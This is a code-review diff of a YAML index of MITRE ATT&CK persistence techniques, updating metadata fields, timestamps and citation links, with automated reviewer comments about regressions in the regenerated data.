- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1053.005
atomic_tests: []
T1205.002:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-10-20T19:56:18.579Z'
name: Socket Filters
description: |-
Adversaries may attach filters to a network socket to monitor then activate backdoors used for persistence or command and control. With elevated permissions, adversaries can use features such as the `libpcap` library to open sockets and install filters to allow or disallow certain types of data to come through the socket. The filter may apply to all traffic passing through the specified network interface (or every interface if not specified). When the network interface receives a packet matching the filter criteria, additional actions can be triggered on the host, such as activation of a reverse shell.
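Review bot: the T1205.002 `modified` timestamp moves backwards here (`2022-11-08T14:00:00.188Z` to `2022-10-20T19:56:18.579Z`), and the same regression shows up for T1133, T1546.006, T1547.014 and T1542.005 further down, while objects whose content actually changed (T1053.002, T1053.005, T1556.003, T1053.003, T1137) move forward. A `modified` value going back in time usually means the generator switched sources (a different bundle, or the object's own timestamp instead of a collection-level one); confirm which ATT&CK bundle this was regenerated from and note it in the PR, since downstream tooling that syncs on `modified` will treat these objects as stale.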
@@ -27007,7 +27399,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1037:
technique:
@@ -27072,49 +27463,10 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1556.003:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Scott Knight, @sdotknight, VMware Carbon Black
- - George Allen, VMware Carbon Black
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771
- type: attack-pattern
- created: '2020-06-26T04:01:09.648Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1556.003
- url: https://attack.mitre.org/techniques/T1556/003
- - source_name: Apple PAM
- url: https://opensource.apple.com/source/dovecot/dovecot-239/dovecot/doc/wiki/PasswordDatabase.PAM.txt
- description: Apple. (2011, May 11). PAM - Pluggable Authentication Modules.
- Retrieved June 25, 2020.
- - source_name: Man Pam_Unix
- url: https://linux.die.net/man/8/pam_unix
- description: die.net. (n.d.). pam_unix(8) - Linux man page. Retrieved June
- 25, 2020.
- - source_name: Red Hat PAM
- url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/managing_smart_cards/pluggable_authentication_modules
- description: Red Hat. (n.d.). CHAPTER 2. USING PLUGGABLE AUTHENTICATION MODULES
- (PAM). Retrieved June 25, 2020.
- - source_name: PAM Backdoor
- url: https://github.com/zephrax/linux-pam-backdoor
- description: zephrax. (2018, August 3). linux-pam-backdoor. Retrieved June
- 25, 2020.
- - source_name: PAM Creds
- url: https://x-c3ll.github.io/posts/PAM-backdoor-DNS/
- description: Fernández, J. M. (2018, June 27). Exfiltrating credentials via
- PAM backdoors & DNS requests. Retrieved June 26, 2020.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-08-21T16:19:55.082Z'
name: 'Modify Authentication Process: Pluggable Authentication Modules'
description: |-
Adversaries may modify pluggable authentication modules (PAM) to access user credentials or enable otherwise unwarranted access to accounts. PAM is a modular system of configuration files, libraries, and executable files which guide authentication for many services. The most common authentication module is pam_unix.so
, which retrieves, sets, and verifies account authentication information in /etc/passwd
and /etc/shadow
.(Citation: Apple PAM)(Citation: Man Pam_Unix)(Citation: Red Hat PAM)
@@ -27129,20 +27481,57 @@ persistence:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_contributors:
+ - Scott Knight, @sdotknight, VMware Carbon Black
+ - George Allen, VMware Carbon Black
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor PAM configuration and module paths (ex: /etc/pam.d/
) for changes. Use system-integrity tools such as AIDE and monitoring tools such as auditd to monitor PAM files.
Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times (ex: when the user is not present) or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '2.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ x_mitre_version: '2.1'
x_mitre_data_sources:
- 'File: File Modification'
- 'Logon Session: Logon Session Creation'
- x_mitre_permissions_required:
- - root
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771
+ created: '2020-06-26T04:01:09.648Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1556/003
+ external_id: T1556.003
+ - source_name: Apple PAM
+ description: Apple. (2011, May 11). PAM - Pluggable Authentication Modules.
+ Retrieved June 25, 2020.
+ url: https://opensource.apple.com/source/dovecot/dovecot-239/dovecot/doc/wiki/PasswordDatabase.PAM.txt
+ - source_name: Man Pam_Unix
+ description: die.net. (n.d.). pam_unix(8) - Linux man page. Retrieved June
+ 25, 2020.
+ url: https://linux.die.net/man/8/pam_unix
+ - source_name: PAM Creds
+ description: Fernández, J. M. (2018, June 27). Exfiltrating credentials via
+ PAM backdoors & DNS requests. Retrieved June 26, 2020.
+ url: https://x-c3ll.github.io/posts/PAM-backdoor-DNS/
+ - source_name: Red Hat PAM
+ description: Red Hat. (n.d.). CHAPTER 2. USING PLUGGABLE AUTHENTICATION MODULES
+ (PAM). Retrieved June 25, 2020.
+ url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/managing_smart_cards/pluggable_authentication_modules
+ - source_name: PAM Backdoor
+ description: zephrax. (2018, August 3). linux-pam-backdoor. Retrieved June
+ 25, 2020.
+ url: https://github.com/zephrax/linux-pam-backdoor
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1556.003
atomic_tests: []
T1574.007:
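Review bot: `x_mitre_permissions_required:` / `- root` is removed from T1556.003 and nothing in the reordered block re-adds it, so the index loses the only field that recorded this technique needing root; if upstream dropped the property at version 2.1 that is expected, but it should be called out in the PR rather than buried in a field reorder. The rest of the hunk is a reorder of the same five external_references (Apple PAM, Man Pam_Unix, Red Hat PAM, PAM Backdoor, PAM Creds) with `revoked: false` and `x_mitre_deprecated: false` added and `x_mitre_attack_spec_version` bumped 2.1.0 to 3.2.0, consistent with the other objects.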
@@ -27232,7 +27621,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1546.013:
technique:
@@ -27320,7 +27708,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.013
atomic_tests: []
T1543:
@@ -27405,11 +27792,10 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1133:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:36.318Z'
name: External Remote Services
description: |-
Adversaries may leverage external-facing remote services to initially access and/or persist within a network. Remote services such as VPNs, Citrix, and other access mechanisms allow users to connect to internal enterprise network resources from external locations. There are often remote service gateways that manage connections and credential authentication for these services. Services such as [Windows Remote Management](https://attack.mitre.org/techniques/T1021/006) and [VNC](https://attack.mitre.org/techniques/T1021/005) can also be used externally.(Citation: MacOS VNC software for Remote Desktop)
@@ -27487,7 +27873,6 @@ persistence:
url: https://www.trendmicro.com/en_us/research/20/f/xorddos-kaiji-botnet-malware-variants-target-exposed-docker-servers.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
identifier: T1133
atomic_tests: []
T1546.006:
@@ -27520,7 +27905,7 @@ persistence:
Adversaries may establish persistence by executing malicious content triggered by the execution of tainted binaries. Mach-O binaries have a series of headers that are used to perform certain operations when a binary is loaded. The LC_LOAD_DYLIB header in a Mach-O binary tells macOS and OS X which dynamic libraries (dylibs) to load during execution time. These can be added ad-hoc to the compiled binary as long as adjustments are made to the rest of the fields and dependencies.(Citation: Writing Bad Malware for OSX) There are tools available to perform these changes.
Adversaries may modify Mach-O binary headers to load and execute malicious dylibs every time the binary is executed. Although any changes will invalidate digital signatures on binaries because the binary is being modified, this can be remediated by simply removing the LC_CODE_SIGNATURE command from the binary so that the signature isn’t checked at load time.(Citation: Malware Persistence on OS X)
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-20T17:08:21.101Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: LC_LOAD_DYLIB Addition
x_mitre_detection: Monitor processes for those that may be used to modify binary
@@ -27543,11 +27928,10 @@ persistence:
- User
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1053.007:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T16:26:03.731Z'
name: Kubernetes Cronjob
description: |-
Adversaries may abuse task scheduling functionality provided by container orchestration tools such as Kubernetes to schedule deployment of containers configured to execute malicious code. Container orchestration jobs run these automated tasks at a specific date and time, similar to cron jobs on a Linux system. Deployments of this type can also be configured to maintain a quantity of containers over time, automating the process of maintaining persistence within a cluster.
@@ -27605,9 +27989,8 @@ persistence:
url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1053.007
atomic_tests: []
T1542.001:
@@ -27688,12 +28071,11 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1542.001
atomic_tests: []
T1574.011:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2024-09-12T19:42:48.016Z'
name: 'Hijack Execution Flow: Services Registry Permissions Weakness'
description: |-
Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services. Adversaries may use flaws in the permissions for Registry keys related to services to redirect from the originally specified executable to one that they control, in order to launch their own code when a service starts. Windows stores local service configuration information in the Registry under HKLM\SYSTEM\CurrentControlSet\Services
. The information stored under a service's Registry keys can be manipulated to modify a service's execution parameters through tools such as the service controller, sc.exe, [PowerShell](https://attack.mitre.org/techniques/T1059/001), or [Reg](https://attack.mitre.org/software/S0075). Access to Registry keys is controlled through access control lists and user permissions. (Citation: Registry Key Security)(Citation: malware_hides_service)
@@ -27712,7 +28094,6 @@ persistence:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- x_mitre_attack_spec_version: 2.1.0
x_mitre_contributors:
- Travis Smith, Tripwire
- Matthew Demaske, Adaptforward
@@ -27726,7 +28107,6 @@ persistence:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.1'
@@ -27753,8 +28133,8 @@ persistence:
external_id: T1574.011
- source_name: Tweet Registry Perms Weakness
description: "@r0wdy_. (2017, November 30). Service Recovery Parameters. Retrieved
- April 9, 2018."
- url: https://twitter.com/r0wdy_/status/936365549553991680
+ September 12, 2024."
+ url: https://x.com/r0wdy_/status/936365549553991680
- source_name: insecure_reg_perms
description: Clément Labro. (2020, November 12). Windows RpcEptMapper Service
Insecure Registry Permissions EoP. Retrieved August 25, 2021.
@@ -27785,7 +28165,8 @@ persistence:
url: https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj_zegost
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1574.011
atomic_tests: []
T1542.003:
@@ -27842,11 +28223,10 @@ persistence:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
atomic_tests: []
T1547:
technique:
- modified: '2024-04-16T12:26:07.945Z'
+ modified: '2024-09-12T15:27:58.051Z'
name: Boot or Logon Autostart Execution
description: |-
Adversaries may configure system settings to automatically execute a program during system boot or logon to maintain persistence or gain higher-level privileges on compromised systems. Operating systems may have mechanisms for automatically running a program on system boot or account logon.(Citation: Microsoft Run Key)(Citation: MSDN Authentication Packages)(Citation: Microsoft TimeProvider)(Citation: Cylance Reg Persistence Sept 2013)(Citation: Linux Kernel Programming) These mechanisms may include automatically executing programs that are placed in specially designated directories or are referenced by repositories that store configuration information, such as the Windows Registry. An adversary may achieve the same goal by modifying or extending features of the kernel.
@@ -27918,9 +28298,9 @@ persistence:
2017.
url: https://msdn.microsoft.com/library/windows/desktop/aa374733.aspx
- source_name: Microsoft Run Key
- description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved November
- 12, 2014.
- url: http://msdn.microsoft.com/en-us/library/aa376977
+ description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved September
+ 12, 2024.
+ url: https://learn.microsoft.com/en-us/windows/win32/setupapi/run-and-runonce-registry-keys
- source_name: Microsoft TimeProvider
description: Microsoft. (n.d.). Time Provider. Retrieved March 26, 2018.
url: https://msdn.microsoft.com/library/windows/desktop/ms725475.aspx
@@ -27936,12 +28316,11 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547
atomic_tests: []
T1547.014:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-22T14:17:17.353Z'
name: Active Setup
description: |-
Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine. Active Setup is a Windows mechanism that is used to execute programs when a user logs in. The value stored in the Registry key will be executed after a user logs into the computer.(Citation: Klein Active Setup 2010) These programs will be executed under the context of the user and will have the account's associated permissions level.
@@ -28016,7 +28395,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.014
atomic_tests: []
T1542.005:
@@ -28059,7 +28437,7 @@ persistence:
url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#26
description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Boot
Information. Retrieved October 21, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-10-22T16:35:53.806Z'
name: TFTP Boot
description: |-
Adversaries may abuse netbooting to load an unauthorized network device operating system from a Trivial File Transfer Protocol (TFTP) server. TFTP boot (netbooting) is commonly used by network administrators to load configuration-controlled network device images from a centralized management server. Netbooting is one option in the boot sequence and can be used to centralize, manage, and control device images.
@@ -28083,8 +28461,6 @@ persistence:
- 'Firmware: Firmware Modification'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1543.003:
technique:
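Review bot: this hunk removes both `spec_version: '2.1'` and `x_mitre_attack_spec_version: 2.1.0` from T1542.005 (TFTP Boot) without adding a replacement, unlike T1574.011 where the same removal is paired with `x_mitre_attack_spec_version: 3.2.0` being re-added in a later hunk. Together with the `modified` timestamp going back to `2020-10-22` in the hunk above, this object now carries no attack spec version at all; check that the source bundle really lacks it rather than the generator having dropped it.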
@@ -28239,31 +28615,11 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1543.003
atomic_tests: []
T1053.003:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--2acf44aa-542f-4366-b4eb-55ef5747759c
- type: attack-pattern
- created: '2019-12-03T14:25:00.538Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1053.003
- url: https://attack.mitre.org/techniques/T1053/003
- - source_name: 20 macOS Common Tools and Techniques
- url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
- description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
- Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-10-15T18:45:51.945Z'
name: 'Scheduled Task/Job: Cron'
description: "Adversaries may abuse the cron
utility to perform
task scheduling for initial or recurring execution of malicious code.(Citation:
@@ -28280,6 +28636,7 @@ persistence:
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
+ x_mitre_deprecated: false
x_mitre_detection: "Monitor scheduled task creation from common utilities using
command-line invocation. Legitimate scheduled tasks may be created during
installation of new software or through system administration functions. Look
@@ -28290,9 +28647,13 @@ persistence:
part of a chain of behavior that could lead to other activities, such as network
connections made for Command and Control, learning details about the environment
through Discovery, and Lateral Movement. "
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'File: File Modification'
- 'Process: Process Creation'
@@ -28300,17 +28661,37 @@ persistence:
- 'Command: Command Execution'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_remote_support: false
+ type: attack-pattern
+ id: attack-pattern--2acf44aa-542f-4366-b4eb-55ef5747759c
+ created: '2019-12-03T14:25:00.538Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1053/003
+ external_id: T1053.003
+ - source_name: 20 macOS Common Tools and Techniques
+ description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
+ Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
+ url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1053.003
atomic_tests: []
T1137:
technique:
- x_mitre_platforms:
- - Windows
- - Office 365
- x_mitre_domains:
- - enterprise-attack
+ modified: '2024-10-15T16:01:21.255Z'
+ name: Office Application Startup
+ description: |-
+ Adversaries may leverage Microsoft Office-based applications for persistence between startups. Microsoft Office is a fairly common application suite on Windows-based operating systems within an enterprise network. There are multiple mechanisms that can be used with Office for persistence when an Office-based application is started; this can include the use of Office Template Macros and add-ins.
+
+ A variety of features have been discovered in Outlook that can be abused to obtain persistence, such as Outlook rules, forms, and Home Page.(Citation: SensePost Ruler GitHub) These persistence mechanisms can work within Outlook or be used through Office 365.(Citation: TechNet O365 Outlook Rules)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
x_mitre_contributors:
- Nick Carr, Mandiant
- Microsoft Threat Intelligence Center (MSTIC)
@@ -28318,79 +28699,73 @@ persistence:
- Praetorian
- Loic Jaquemet
- Ricardo Dias
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--2c4d4e92-0ccf-4a97-b54c-86d662988a53
+ x_mitre_deprecated: false
+ x_mitre_detection: |-
+ Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior. If winword.exe is the parent process for suspicious processes and activity relating to other adversarial techniques, then it could indicate that the application was used maliciously.
+
+ Many Office-related persistence mechanisms require changes to the Registry and for binaries, files, or scripts to be written to disk or existing files modified to include malicious scripts. Collect events related to Registry key creation and modification for keys that could be used for Office-based persistence.(Citation: CrowdStrike Outlook Forms)(Citation: Outlook Today Home Page)
+
+ Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ - Office Suite
+ x_mitre_version: '1.4'
+ x_mitre_data_sources:
+ - 'File: File Creation'
+ - 'Application Log: Application Log Content'
+ - 'Windows Registry: Windows Registry Key Modification'
+ - 'File: File Modification'
+ - 'Module: Module Load'
+ - 'Process: Process Creation'
+ - 'Windows Registry: Windows Registry Key Creation'
+ - 'Command: Command Execution'
type: attack-pattern
+ id: attack-pattern--2c4d4e92-0ccf-4a97-b54c-86d662988a53
created: '2017-12-14T16:46:06.044Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1137
url: https://attack.mitre.org/techniques/T1137
- - source_name: SensePost Ruler GitHub
- url: https://github.com/sensepost/ruler
- description: 'SensePost. (2016, August 18). Ruler: A tool to abuse Exchange
- services. Retrieved February 4, 2019.'
+ external_id: T1137
+ - source_name: Microsoft Detect Outlook Forms
+ description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook
+ Rules and Custom Forms Injections Attacks in Office 365. Retrieved February
+ 4, 2019.
+ url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
- source_name: TechNet O365 Outlook Rules
- url: https://blogs.technet.microsoft.com/office365security/defending-against-rules-and-forms-injection/
description: Koeller, B.. (2018, February 21). Defending Against Rules and
Forms Injection. Retrieved November 5, 2019.
+ url: https://blogs.technet.microsoft.com/office365security/defending-against-rules-and-forms-injection/
- source_name: CrowdStrike Outlook Forms
- url: https://malware.news/t/using-outlook-forms-for-lateral-movement-and-persistence/13746
description: Parisi, T., et al. (2017, July). Using Outlook Forms for Lateral
Movement and Persistence. Retrieved February 5, 2019.
- - source_name: Outlook Today Home Page
- url: https://medium.com/@bwtech789/outlook-today-homepage-persistence-33ea9b505943
- description: Soutcast. (2018, September 14). Outlook Today Homepage Persistence.
- Retrieved February 5, 2019.
- - source_name: Microsoft Detect Outlook Forms
- url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
- description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook
- Rules and Custom Forms Injections Attacks in Office 365. Retrieved February
- 4, 2019.
+ url: https://malware.news/t/using-outlook-forms-for-lateral-movement-and-persistence/13746
+ - source_name: SensePost Ruler GitHub
+ description: 'SensePost. (2016, August 18). Ruler: A tool to abuse Exchange
+ services. Retrieved February 4, 2019.'
+ url: https://github.com/sensepost/ruler
- source_name: SensePost NotRuler
- url: https://github.com/sensepost/notruler
description: SensePost. (2017, September 21). NotRuler - The opposite of Ruler,
provides blue teams with the ability to detect Ruler usage against Exchange.
Retrieved February 4, 2019.
- modified: '2022-04-25T14:00:00.188Z'
- name: Office Application Startup
- description: |-
- Adversaries may leverage Microsoft Office-based applications for persistence between startups. Microsoft Office is a fairly common application suite on Windows-based operating systems within an enterprise network. There are multiple mechanisms that can be used with Office for persistence when an Office-based application is started; this can include the use of Office Template Macros and add-ins.
-
- A variety of features have been discovered in Outlook that can be abused to obtain persistence, such as Outlook rules, forms, and Home Page.(Citation: SensePost Ruler GitHub) These persistence mechanisms can work within Outlook or be used through Office 365.(Citation: TechNet O365 Outlook Rules)
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: persistence
- x_mitre_detection: |-
- Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior. If winword.exe is the parent process for suspicious processes and activity relating to other adversarial techniques, then it could indicate that the application was used maliciously.
-
- Many Office-related persistence mechanisms require changes to the Registry and for binaries, files, or scripts to be written to disk or existing files modified to include malicious scripts. Collect events related to Registry key creation and modification for keys that could be used for Office-based persistence.(Citation: CrowdStrike Outlook Forms)(Citation: Outlook Today Home Page)
-
- Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)
- x_mitre_version: '1.3'
+ url: https://github.com/sensepost/notruler
+ - source_name: Outlook Today Home Page
+ description: Soutcast. (2018, September 14). Outlook Today Homepage Persistence.
+ Retrieved February 5, 2019.
+ url: https://medium.com/@bwtech789/outlook-today-homepage-persistence-33ea9b505943
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- x_mitre_data_sources:
- - 'File: File Creation'
- - 'Application Log: Application Log Content'
- - 'Windows Registry: Windows Registry Key Modification'
- - 'File: File Modification'
- - 'Module: Module Load'
- - 'Process: Process Creation'
- - 'Windows Registry: Windows Registry Key Creation'
- - 'Command: Command Execution'
- x_mitre_permissions_required:
- - User
- - Administrator
- x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1137
atomic_tests: []
T1098.003:
technique:
- modified: '2024-03-29T18:29:06.873Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Account Manipulation: Additional Cloud Roles'
description: "An adversary may add additional roles or permissions to an adversary-controlled
cloud account to maintain persistent access to a tenant. For example, adversaries
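Review bot: the T1137 object loses `modified`, `name`, `description`, `kill_chain_phases`, `x_mitre_detection`, `x_mitre_version` and `x_mitre_is_subtechnique: false` in this hunk and none of them are re-added in the part of the hunk shown here; please confirm the reordered object above still carries every one of them, because a technique entry without `name`/`description` breaks any consumer of the index and `x_mitre_is_subtechnique` is the field used to tell techniques from sub-techniques. Dropping `x_mitre_permissions_required` is fine if the new source bundle no longer emits that field, but that should be stated in the commit message rather than left for readers to infer.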
@@ -28420,6 +28795,7 @@ persistence:
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Microsoft Threat Intelligence Center (MSTIC)
- Alex Parsons, Crowdstrike
@@ -28430,6 +28806,7 @@ persistence:
- Praetorian
- Alex Soler, AttackIQ
- Arad Inbar, Fidelis Security
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: 'Collect activity logs from IAM services and cloud administrator
accounts to identify unusual activity in the assignment of roles to those
@@ -28438,13 +28815,13 @@ persistence:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- - Office 365
- IaaS
- SaaS
- - Google Workspace
- - Azure AD
- x_mitre_version: '2.4'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.5'
x_mitre_data_sources:
- 'User Account: User Account Modification'
type: attack-pattern
